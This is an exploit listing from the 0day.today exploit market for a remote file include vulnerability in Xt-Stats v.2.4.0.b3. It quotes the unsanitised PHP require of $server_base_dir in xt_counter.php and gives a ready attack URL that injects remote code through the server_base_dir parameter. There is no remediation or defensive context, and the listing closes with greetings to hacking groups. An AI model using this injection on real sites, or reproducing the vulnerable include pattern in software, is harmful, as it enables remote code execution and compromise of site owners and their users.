[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability

Author
ThE dE@Th
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1434
Category
web applications
Date add
27-01-2007
Platform
unsorted
=======================================================================
Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability
=======================================================================



**************************************************
Finded by ThE dE@Th
*******************

Greetz For :AsB-May Team & HaCk.eGy
***********************************

xt_counter.php:
*************

require( $server_base_dir.'management/sources/counter_class.php');


http://www.site.com/[path]/xt_counter.php?server_base_dir=[evil_code]
*************************************************************



#  0day.today [2024-11-15]  #